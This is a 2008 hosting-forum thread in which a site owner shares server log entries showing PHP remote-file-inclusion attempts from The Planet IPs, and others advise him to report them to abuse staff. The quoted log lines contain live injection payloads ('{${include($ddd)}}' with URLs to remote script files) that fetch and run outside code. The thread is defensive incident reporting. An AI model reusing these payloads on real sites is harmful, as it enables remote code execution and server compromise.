I was just reviewing some of the tracking on one of my sites and I see this...

http://www.mydomain.com/poll/comments.php?...uk/id/mic22.txt?
2008-03-21
13:01:05
66.98.216.89

When I look up that IP in Arin I see that it is a The Planet IP.


As you can clearly see if you load that appended TXT file into a browser window, it is a php hack script. Why is someoen from The Planet running a hack script on one of my servers?

I'm certainly no tech-guy, but it looks like the hack attempt is coming from a customer hosted on one of The Planet's IP addresses (rather than from someone working at The Planet). I might be entirely wrong, but if that's the case, I'm sure the abuse department would lay the smack down on them for you if you pass an email along to them.

-Kevin

I would think that is a distinct and probable thing. Could as well be someone spoofing their IP. Ill forward to abuse.

Awesome.

Did you see Mark calling you out in the 1,000,000 post thread?: http://forums.theplanet.com/index.php?showtopic=49093&view=findpost&p=589087 ://http://forums.theplanet.com/index.p...t&p=589087 ://http://forums.theplanet.com/index.p...t&p=589087 ://http://forums.theplanet.com/index.p...t&p=589087

Hahaha. http://youtube.com/watch?v=W91sqAs-_-g

You can't spoof a fully established TCP connection, since it requires that you complete the tcp 3-way handshake.

Yet another from a ThePlanet IP...

http://www.mydomain.com/?id=%7B$%7Binclude($ddd)
%7D%7D%7B$%7Bexit()%7D%7D&ddd=
http://www.idowebhosting.net/catalog/includes/sys.txt?? <<---- NOTE THIS PART
207.44.238.63
2008-03-23
08:57:40

Sad that TP allows this stuff so regularly.

Yet one more....

http://www.mydomain.com/aeropolls/?id=%7B&...lude($ddd)
%7D%7D%7B$%7Bexit()%7D%7D&ddd=
http://www.mediablackouts.com/wiki/db/id.txt?
70.85.175.34
2008-03-23
08:58:40


Can anything be done to halt this or is it one of those issues that as long as I have everything buttoned up correctly all is well?

Just as an FYI I have several other The Planet IPs attempting this. Here are a couple of more. Seems odd that my server is having so many attempts to hack php. ANy advice on how I can pinpoint why this is happening and what all I need to aware of to prevent any harm?

209.85.107.22
74.52.9.219

What software are you using to monitor and detect these hack attempts, Aerosmith? Mod Security?

Actually the quickest way for me to find this is by viewing one of the counter scripts that I have written. These things show up as 404 errors and get flagged by that script. I have security packages installed as well, just this is somehting that is a very quick and easy palce to see such activity.

Interesting...

Make sure to get those logs over to abuse at theplanet dot com so they can investigate. Some of those IP addresses look like they may, or may not, have open investigations already going, but the more information our abuse guys can get, the better off we all are.

I can't really divulge any specific information on any specific investigations.

OK I'll do that... Thank you.